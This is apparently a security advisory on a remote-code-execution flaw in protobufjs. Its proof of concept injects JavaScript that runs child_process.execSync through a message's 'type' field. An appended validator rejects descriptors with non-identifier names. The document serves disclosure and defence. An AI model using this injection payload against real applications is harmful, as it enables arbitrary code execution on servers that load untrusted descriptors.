Severity: Critical
CVSS Score: 9.4
### Summary

protobufjs compiles protobuf definitions into JS functions. Attackers who control those definitions can manipulate them to execute arbitrary JS code.

### Details

Attackers can inject arbitrary code in the `type` fields of protobuf definitions. Because protobufjs builds the decoder for a message by generating JS source from the definition, the injected string becomes part of that source and runs when an object is decoded using that definition.

### PoC

```js
const protobuf = require('protobufjs');

// Descriptor whose "type" value (and matching nested message name) carries JS code
const maliciousDescriptor = JSON.parse(`{"nested":{"User":{"fields":{"id":{"type":"int32","id":1},"data":{"type":"Data(){console.log(process.mainModule.require('child_process').execSync('id').toString())};\\nfunction X","id":2}}},"Data(){console.log(process.mainModule.require('child_process').execSync('id').toString())};\\nfunction X":{"fields":{"content":{"type":"string","id":1}}}}}`);

const root = protobuf.Root.fromJSON(maliciousDescriptor);
const UserType = root.lookupType("User");

// Wire bytes for a User message: id = 1, data = { content: "hello" }
const userBytes = Buffer.from([0x08, 0x01, 0x12, 0x07, 0x0a, 0x05, 0x68, 0x65, 0x6c, 0x6c, 0x6f]);

// Decoding generates and runs the decoder function, executing the injected code
try {
  const user = UserType.decode(userBytes);
} catch (e) {}
```

### Impact

Remote code execution when attackers can control the protobuf definition files.
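A defensive pre-check for descriptors loaded from an untrusted source, added here as an example that is not part of the advisory or of protobufjs: it rejects any message, field or `type` name that is not a plain protobuf identifier before the descriptor reaches `Root.fromJSON`. The descriptors and the `findUnsafeNames` function below are constructed for this illustration.

```javascript
// Protobuf identifiers: letter or underscore, then letters, digits or
// underscores; type references may be dotted and may start with a dot
// (fully qualified). Anything outside this grammar cannot be a legitimate
// name and must not be embedded into generated decoder source.
const IDENT = /^[A-Za-z_][A-Za-z0-9_]*$/;
const TYPE_REF = /^\.?[A-Za-z_][A-Za-z0-9_]*(\.[A-Za-z_][A-Za-z0-9_]*)*$/;

// Walk a JSON descriptor in the shape accepted by Root.fromJSON and return
// "path: problem" strings. An empty list means every name is well-formed;
// only then should the descriptor be handed to protobufjs.
function findUnsafeNames(node, path = '', problems = []) {
  if (!node || typeof node !== 'object') return problems;
  for (const [name, child] of Object.entries(node.nested || {})) {
    const here = path ? `${path}.${name}` : name;
    if (!IDENT.test(name)) problems.push(`${here}: bad nested name`);
    findUnsafeNames(child, here, problems);
  }
  for (const [fname, field] of Object.entries(node.fields || {})) {
    const here = path ? `${path}.${fname}` : fname;
    if (!IDENT.test(fname)) problems.push(`${here}: bad field name`);
    if (!field || typeof field !== 'object') continue;
    for (const key of ['type', 'keyType']) {
      if (key in field && !TYPE_REF.test(String(field[key]))) {
        problems.push(`${here}: bad ${key} ${JSON.stringify(field[key])}`);
      }
    }
  }
  return problems;
}

// Constructed sample descriptors. The second one carries JS syntax in a
// type name and in a nested message name, the pattern the advisory describes.
const safeDescriptor = { nested: { User: {
  fields: { id: { type: 'int32', id: 1 }, data: { type: 'Data', id: 2 } },
  nested: { Data: { fields: { content: { type: 'string', id: 1 } } } } } } };
const taintedType = 'Data(){}; function X';
const unsafeDescriptor = { nested: {
  User: { fields: { id: { type: 'int32', id: 1 }, data: { type: taintedType, id: 2 } } },
  [taintedType]: { fields: { content: { type: 'string', id: 1 } } } } };

console.log(findUnsafeNames(safeDescriptor));          // []
console.log(findUnsafeNames(unsafeDescriptor).length); // 2
```

Run the check on the advisory's own descriptor and it reports both the field `type` and the nested message name, so the descriptor is refused before any decoder is generated.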